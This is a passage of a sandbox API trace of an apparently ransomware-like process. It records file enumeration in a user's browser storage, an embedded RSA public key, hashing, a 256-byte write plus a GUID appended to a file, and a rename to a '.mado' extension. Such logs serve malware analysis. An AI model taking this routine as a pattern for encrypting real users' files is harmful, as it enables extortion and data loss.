| out: hHeap=0x2c0000) returned 1 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\") returned="3O75JDME\\" [0207.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b836a8 [0207.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.241] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0207.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0207.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b836a8 | out: hHeap=0x2c0000) returned 1 [0207.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0207.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0207.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321738 [0207.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bb80 | out: hHeap=0x2c0000) returned 1 [0207.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0207.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0207.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321738 | out: hHeap=0x2c0000) returned 1 [0207.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0207.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0207.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b875f8 [0207.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0207.242] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b875f8 | out: hHeap=0x2c0000) returned 1 [0207.242] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.242] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.242] PathFindFileNameW (pszPath="") returned="" [0207.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.242] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.245] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x605dd8a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.245] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 1 [0207.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11e) returned 0x336fe98 [0207.245] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned=".xml" [0207.245] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.246] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=13) returned 1 [0207.246] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.249] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0207.249] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0xd, lpOverlapped=0x0) returned 1 [0207.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0207.249] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.250] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.250] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0207.250] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.250] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.250] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0207.251] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0207.251] GetLastError () returned 0x0 [0207.251] CryptDestroyHash (hHash=0x32ef238) returned 1 [0207.251] CryptReleaseContext (hProv=0x321738, dwFlags=0x0) returned 1 [0207.251] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0207.251] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0207.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0207.251] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0207.251] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b836a8, Size=0x218) returned 0x3b7c6a8 [0207.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b7b950 [0207.251] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0xd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.251] WriteFile (in: hFile=0x63c, lpBuffer=0x3b817b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b817b0*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0207.251] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0207.252] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0207.252] CloseHandle (hObject=0x63c) returned 1 [0207.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b67078 [0207.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8f0) returned 0x3b7b950 [0207.253] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.mado")) returned 1 [0207.254] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x605dd8a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x696aec80, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="www.google[1].xml", cAlternateFileName="WWWGOO~1.XML")) returned 0 [0207.254] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0100 | out: hHeap=0x2c0000) returned 1 [0207.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d65b8 | out: hHeap=0x2c0000) returned 1 [0207.254] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d65b8 [0207.254] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.258] RtlAllocateHeap (HeapHandle=0x2c0000, 